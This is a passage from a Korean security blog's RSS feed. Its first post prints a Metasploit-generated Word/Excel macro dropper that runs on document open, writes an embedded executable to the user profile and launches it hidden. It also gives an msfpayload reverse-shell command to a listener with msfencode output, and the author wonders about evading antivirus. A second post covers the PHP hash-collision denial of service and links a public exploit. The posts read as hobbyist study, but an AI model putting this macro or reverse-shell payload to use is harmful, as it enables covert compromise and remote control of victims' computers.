&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Bntml11 = Bntml4.Range.Text&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;If (Bntml9 = True) Then&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Bntml8 = 1&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;While (Bntml8 &amp;lt; Len(Bntml11))&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Bntml6 = Mid(Bntml11,Bntml8,4)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Put #Bntml3, , Bntml6&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Bntml8 = Bntml8 + 4&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Wend&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;ElseIf (InStr(1,Bntml11,Ilbpdhngga) &amp;gt; 0 And Len(Bntml11) &amp;gt; 0) Then&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Bntml9 = True&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;&amp;nbsp;End If&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Next&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Close #Bntml3&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml13(Bntml1)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;End Sub&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Sub Bntml13(Bntml10 As String)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml7 As Integer&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Dim Bntml2 As String&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml2 = Environ(&quot;USERPROFILE&quot;)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;ChDrive (Bntml2)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;ChDir (Bntml2)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Bntml7 = Shell(Bntml10, vbHide)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;End Sub&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Sub AutoOpen()&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Auto_Open&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;End Sub&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Sub Workbook_Open()&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Auto_Open&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;End Sub&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'**************************************************************&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'* PAYLOAD DATA&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'*&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;'**************************************************************&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Ilbpdhngga&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;amp;H4D&amp;amp;H5A&amp;amp;H90&amp;amp;H00&amp;amp;H03&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H04&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;HFF&amp;amp;HFF&amp;amp;H00&amp;amp;H00&amp;amp;HB8&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H40&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;HE8&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H0E&amp;amp;H1F&amp;amp;HBA&amp;amp;H0E&amp;amp;H00&amp;amp;HB4&amp;amp;H09&amp;amp;HCD&amp;amp;H21&amp;amp;HB8&amp;amp;H01&amp;amp;H4C&amp;amp;HCD&amp;amp;H21&amp;amp;H54&amp;amp;H68&amp;amp;H69&amp;amp;H73&amp;amp;H20&amp;amp;H70&amp;amp;H72&amp;amp;H6F&amp;amp;H67&amp;amp;H72&amp;amp;H61&amp;amp;H6D&amp;amp;H20&amp;amp;H63&amp;amp;H61&amp;amp;H6E&amp;amp;H6E&amp;amp;H6F&amp;amp;H74&amp;amp;H20&amp;amp;H62&amp;amp;H65&amp;amp;H20&amp;amp;H72&amp;amp;H75&amp;amp;H6E&amp;amp;H20&amp;amp;H69&amp;amp;H6E&amp;amp;H20&amp;amp;H44&amp;amp;H4F&amp;amp;H53&amp;amp;H20&amp;amp;H6D&amp;amp;H6F&amp;amp;H64&amp;amp;H65&amp;amp;H2E&amp;amp;H0D&amp;amp;H0D&amp;amp;H0A&amp;amp;H24&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H00&amp;amp;H93&amp;amp;H38&amp;amp;HF0&amp;amp;HD6&amp;amp;HD7&amp;amp;H59&amp;amp;H9E&amp;amp;H85&amp;amp;HD7&amp;amp;H59&amp;amp;H9E&amp;amp;H85&amp;amp;HD7&amp;amp;H59&amp;amp;H9E&amp;amp;H85&amp;amp;HAC&amp;amp;H45&amp;amp;H92&amp;amp;H85&amp;amp;HD3&amp;amp;...(snip)...&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
너무 길게 나와서 앞뒤로 짤랐습니다. &lt;br /&gt;
파일로도 떨궈 봤는데 사이즈가 상당히 크더군요..&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;W&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt; | msfencode -b '\x00'&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Created by msfpayload (&lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;).&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Payload: windows/shell_reverse_tcp&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&amp;nbsp;Length: 314&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;Options: {&quot;LHOST&quot;=&amp;gt;&quot;192.168.126.146&quot;, &quot;LPORT&quot;=&amp;gt;&quot;9999&quot;}&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[-] x86/shikata_ga_nai failed: Encoding failed due to a bad character (index=194, char=0x00)&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] php/base64 succeeded with size 91691 (iteration=1)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;buf = &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x63\x6f\x64\x65\x28\x55\x45\x73\x44\x42\x42\x51\x41\x41&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x41\x41\x49\x41\x4c\x35\x31\x4c\x45\x41\x62\x64\x7a\x76&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x6b\x52\x77\x41\x41\x41\x45\x63\x41\x41\x41\x41\x55\x41&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x41\x41\x41\x54\x55\x56\x55\x51\x53\x31\x4a\x54\x6b\x59&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x76\x54\x55\x46\x4f\x53\x55\x5a\x46\x55\x31\x51\x75\x54&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;...(snip)...&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;war 형태로 type을 war로 지정하고 했더니 exe 형태일때랑 동일한 에러메시지가 떠서 인코딩했더니 상당히 길게 나오네요..&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
항상 msfpayload만 가지고 간단한 쉘코드만 작성해서 사용해봤었는데 msfencode와 같이 사용하면 꽤 괜찮다는 생각이 듭니다.&lt;br /&gt;
다만, msfencode로 인코딩한 파일을 제가 사용하는 빨간우산은 악성코드로 잡더군요..&lt;br /&gt;
바이러스토탈에 올려보니 무려 23개의 백신에서 탐지하고 있었습니다.&lt;br /&gt;
&lt;br /&gt;좀 더 공부해봐야 알겠지만 인코더나 옵션 조정하면 백신에 탐지 안되게 할 수도 있지 않을까요? 흠...&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;우회 관련된 참고할만한 자료&lt;br /&gt;
&lt;br /&gt;Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus&lt;br /&gt;
&lt;A href=&quot;http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3&quot;&gt;http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;0x02 안티바이러스 피해가기&lt;br /&gt;
&lt;A href=&quot;http://linux-virus.springnote.com/pages/4330985?print=1&quot;&gt;http://linux-virus.springnote.com/pages/4330985?print=1&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-152-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-152-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-152-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/152&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>metasploit</category>
			<category>msfencode</category>
			<category>msfpayload</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/152</guid>
			<comments>http://malwarelab.tistory.com/entry/Metasploit-Generating-Payloads#entry152comment</comments>
			<pubDate>Thu, 12 Jan 2012 15:59:03 +0900</pubDate>
		</item>
		<item>
			<title>PHP Hash Table Collisions</title>
			<link>http://malwarelab.tistory.com/entry/PHP-Hash-Table-Collisions</link>
			<description>&lt;br /&gt;
&lt;br /&gt;N사가 당했다고 합니다.&lt;br /&gt;
&lt;br /&gt;exploitdb에 파이썬으로 된 exploit이 공개된 상태이구요..&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://www.exploit-db.com/exploits/18305/&quot;&gt;&lt;A title=&quot;[http://www.exploit-db.com/exploits/18305/]로 이동합니다.&quot; href=&quot;http://www.exploit-db.com/exploits/18305/&quot; target=_blank&gt;http://www.exploit-db.com/exploits/18305/&lt;/A&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
영향 받는 어플리케이션이 많습니다. (PHP, ASP.Net, Java 등등)&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;BLOCKQUOTE&gt;웹서버에서는 Request POST, GET 변수를 hash 구조로 관리한다. 그런데 POST 요청 파라미터수가 상당히 많을 경우(GET 요청은 길이 제한이 있으므로 문제가 되지 않음)에 hash 충돌이 많이 발생하게 되어 CPU load가 상당히 올라가게 된다. 이런 문제는 PHP5, Asp.Net, Java, V8 자바스크립트 엔진 등에서 발생한다.&lt;br /&gt;
&lt;br /&gt;&lt;/BLOCKQUOTE&gt;&lt;br /&gt;
&lt;br /&gt;exe로 된 툴도 유포가 되고 있으니 조만간 더 큰 피해도 있을거라 예상됩니다.&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile1.uf.tistory.com/original/156ECE504F04044411B561&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile1.uf.tistory.com/image/156ECE504F04044411B561&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;hashdostool.png&quot; height=&quot;442&quot; width=&quot;677&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;항상 그렇듯이 Follow TCP Stream 해봤습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile23.uf.tistory.com/original/172313484F040A39087219&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile23.uf.tistory.com/image/172313484F040A39087219&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;hashdos_packet1.png&quot; height=&quot;542&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;표현하기에 너무 많은 문자들이 있어 글자가 겹쳐서 출력되고 있습니다. -_-;;&lt;br /&gt;
&lt;br /&gt;패킷은 다음과 같이 무수히 많은 변수(파라미터)들이 존재하고 있으며 이로 인해 어플리케이션이 뻗는 현상이 발생합니다.&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile23.uf.tistory.com/original/1769864E4F040A891CF923&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile23.uf.tistory.com/image/1769864E4F040A891CF923&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;hashdos_packet2.png&quot; height=&quot;416&quot; width=&quot;527&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
완벽하게 차단은 아직 안되는듯 합니다.&lt;br /&gt;
&lt;br /&gt;다만, 일시적으로 영향을 줄일 수 있다고 합니다. (아래 참고 링크 참조)&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
참고)&lt;br /&gt;
&lt;A href=&quot;http://truefeel.tistory.com/205&quot;&gt;&lt;A title=&quot;[http://truefeel.tistory.com/205]로 이동합니다.&quot; href=&quot;http://truefeel.tistory.com/205&quot; target=_blank&gt;http://truefeel.tistory.com/205&lt;/A&gt;&lt;/A&gt;&lt;br /&gt;
&lt;A href=&quot;http://truefeel.tistory.com/206&quot;&gt;&lt;A title=&quot;[http://truefeel.tistory.com/206]로 이동합니다.&quot; href=&quot;http://truefeel.tistory.com/206&quot; target=_blank&gt;http://truefeel.tistory.com/206&lt;/A&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-151-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-151-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-151-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
